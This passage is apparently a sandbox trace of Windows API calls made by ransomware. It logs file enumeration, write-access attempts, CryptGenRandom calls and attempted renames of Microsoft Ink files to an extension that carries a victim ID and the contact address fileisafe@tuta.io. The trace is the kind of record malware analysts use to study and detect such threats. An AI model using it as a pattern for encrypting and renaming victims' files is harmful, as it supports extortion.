(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui")) returned 0x20 [0146.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.791] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.791] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0146.791] CloseHandle (hObject=0x2f4) returned 1 [0146.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui")) returned 0x20 [0146.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.791] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.988] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=46624) returned 1 [0146.988] CloseHandle (hObject=0x2f4) returned 1 [0146.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat")) returned 0x20 [0146.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.988] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.989] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0146.989] CloseHandle (hObject=0x2f4) returned 1 [0146.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui")) returned 0x20 [0146.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.989] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.990] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0146.990] CloseHandle (hObject=0x2f4) returned 1 [0146.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui")) returned 0x20 [0146.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.990] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.995] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1700352) returned 1 [0146.995] CloseHandle (hObject=0x2f4) returned 1 [0146.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll")) returned 0x20 [0146.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0146.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll")) returned 0 [0146.995] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.996] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=503808) returned 1 [0146.996] CloseHandle (hObject=0x2f4) returned 1 [0146.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll")) returned 0x20 [0146.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.996] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.997] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1540608) returned 1 [0146.997] CloseHandle (hObject=0x2f4) returned 1 [0146.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe")) returned 0x20 [0146.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.997] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.998] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=6368768) returned 1 [0146.998] CloseHandle (hObject=0x2f4) returned 1 [0146.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll")) returned 0x20 [0146.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0146.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll")) returned 0 [0146.998] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.029] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=51200) returned 1 [0147.029] CloseHandle (hObject=0x2f4) returned 1 [0147.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll")) returned 0x20 [0147.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.029] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.029] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1075712) returned 1 [0147.029] CloseHandle (hObject=0x2f4) returned 1 [0147.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll")) returned 0x20 [0147.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.030] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.030] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.030] CloseHandle (hObject=0x2f4) returned 1 [0147.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui")) returned 0x20 [0147.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.030] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.031] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.031] CloseHandle (hObject=0x2f4) returned 1 [0147.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui")) returned 0x20 [0147.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.032] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.032] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0147.032] CloseHandle (hObject=0x2f4) returned 1 [0147.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui")) returned 0x20 [0147.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.032] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.033] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0147.033] CloseHandle (hObject=0x2f4) returned 1 [0147.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui")) returned 0x20 [0147.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.034] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.034] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0147.034] CloseHandle (hObject=0x2f4) returned 1 [0147.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui")) returned 0x20 [0147.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.034] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0147.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.035] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0147.035] CloseHandle (hObject=0x2f4) returned 1 [0147.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui")) returned 0x20 [0147.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.035] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 